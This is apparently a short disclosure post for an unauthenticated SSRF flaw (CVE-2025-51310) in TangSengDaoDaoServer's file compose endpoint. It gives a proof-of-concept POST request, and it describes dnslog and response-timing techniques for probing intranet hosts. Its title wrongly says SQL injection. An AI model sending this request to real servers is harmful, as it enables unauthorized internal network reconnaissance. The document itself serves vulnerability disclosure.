REBUILD system SQL injection vulnerability

TangSengDaoDaoServer has an SSRF vulnerability

  • There is an SSRF vulnerability in the /v1/file/compose/*path interface of TangSengDaoDaoServer, which attackers can exploit to probe internal network services without logging in.(In the underlying implementation of http.Client, its default Transport (http.DefaultTransport) appears to only handle HTTP/HTTPS requests. Therefore, the potential impact of this SSRF vulnerability is relatively limited.)

POC

1
2
3
4
5
6
7
8
9
POST /api/v1/file/compose/a HTTP/1.1
Host: xxxxxx
......
Content-Type: application/json
Content-Length: 31

[
"http://[Domain/Ip]"
]

Affected version

  • v1.0.1~v1.0.5

Vulnerability location:

image-20250504212133779

image-20250504212212936

image-20250504212341247

image-20250504212416983

Vulnerability Exploitation Demonstration

  • Dnslog detection

image-20250504212453308

image-20250504212508400

  • During local environment testing, it can be observed that when an intranet IP is present, the response is very fast, otherwise, it is very slow. This method can be used to probe other intranet services.

image-20250504214526769

image-20250504214903061

image-20250504214619082

CVE

  • CVE-2025-51310
许可协议

本文采用 署名-非商业性使用-相同方式共享 4.0 国际 许可协议,转载请注明出处。